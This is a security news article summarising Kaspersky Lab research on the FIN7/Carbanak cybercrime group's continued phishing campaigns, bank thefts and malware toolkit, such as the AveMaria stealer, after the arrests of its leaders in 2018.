Criminal FIN7/Carbanak empire strike back

Cybercriminal organization FIN7 is still active, despite arrest of its key members.

Main Fin7 activity is stealing of companies’ financial archives (including debit cards), and gaining access to financial data and computers of employees of financial departments in order to steal funds. Criminals even established fake companies and hired pentesters, developers and analysts for unlawful activity

In 2018 were arrested three Ukrainian citizens that were called key figures in FIN7. Nevertheless, when “Kaspersky Lab” researchers analyzed malware operations, in which were used typical for FIN7 attacks in 2017-2018 techniques and procedure, (TTP), they concluded that group continues its activity.

Also was discovered some resemblance to campaigns that were conducted to other bands that borrowed or copied TTP from FIN7.

During the last year group continued attacking organizations with the use of thoughtful targeted fishing. Its peculiar trait was mastery of social engineering techniques. In some cases, prior to sending victim a letter that exchanged correspondence with it for several weeks.

“The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims”, – write experts.

One of the domains that were used during fishing campaigns in 2018 contained nearly 130 users’ names, that made experts from “Kaspersky Lab” concluded that attackers hacked 130 companies.

List of recent FIN7 victims include banks in Europe and Central America. In the recent year group have stolen approximately €13 million from Bank of Valleta on Malta.

Arsenal of FIN7 includes JavaScript-backdoor Griffin, malware software Cobalt/Meterpreter, and in the recent attacks group used famous set of instruments known as Powershell Empire.

In September 2018, right after three group members were arrested, experts discovered in the group’s arsenal AveMaria, a new botnet. AveMaria is a classic bot for stealing of versatile credentials, and is applicable in browsers, messengers, email clients etc. In addition, malware can play role of a keylogger. Since the beginning of the year, experts of Kaspersky Laboratory received more than 1300 AveMaria samples and extracted 130 C&C servers.

Conclusion from Kaspersky Lab

During 2018, Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak/CobaltGoblin cybercrime groups. It was believed that the arrest of the group leader will have an impact on the group’s operations. However, recent data seems to indicate that the attacks have continued without significant drawbacks. One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella. it can be argued, with various level of confidence, that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks.

About Daniel Zimmermann

Daniel Zimmermann has been writing on security and malware subjects for many years and has been working in the security industry for over 10 years. Daniel was educated at the Saarland University in Saarbrücken, Germany and currently lives in New York.

Check Also

Blue Mockingbird hackers

Blue Mockingbird hackers cracked thousands of corporate systems

According to Red Canary analysts, recently has been discovered a new hack group, operating under …

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.